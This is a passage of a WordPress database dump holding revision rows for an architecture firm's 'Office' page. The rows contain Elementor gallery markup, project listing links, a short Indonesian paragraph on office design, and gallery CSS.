e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL09mZmljZS0xLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0yLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0zLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS00LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS01LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS02LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS03LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-8.jpeg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-8\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS04LmpwZWciLCJzbGlkZXNob3ciOiJhbGwtMDBkOTM5MCJ9\">\n														</a>','Office','','inherit','closed','closed','','4759-revision-v1','','','2023-09-22 08:39:17','2023-09-22 08:39:17','',4759,'https://bauhaus.futuremediatrix.com/?p=4861',0,'revision','',0),(4862,3,'2023-09-22 08:39:17','2023-09-22 08:39:17','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/Office-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"Office-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL09mZmljZS0xLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0yLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS0zLmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS00LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS01LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS02LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS03LmpwZyIsInNsaWRlc2hvdyI6ImFsbC0wMGQ5MzkwIn0%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/office-8.jpeg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-00d9390\" data-elementor-lightbox-title=\"office-8\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgwOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL29mZmljZS04LmpwZWciLCJzbGlkZXNob3ciOiJhbGwtMDBkOTM5MCJ9\">\n														</a>','Office','','inherit','closed','closed','','4759-revision-v1','','','2023-09-22 08:39:17','2023-09-22 08:39:17','',4759,'https://bauhaus.futuremediatrix.com/?p=4862',0,'revision','',0),(4863,3,'2023-09-22 08:39:17','2023-09-22 08:39:17','<h3>our recent work</h3>\n														<h2>\n								Bauhaus Office Projects							</h2>\n							<p> Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.\nKami meyakini bahwa ruang kantor yang dirancang dengan baik dapat meningkatkan produktivitas serta membangun interaksi positif antar karyawan. </p>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all 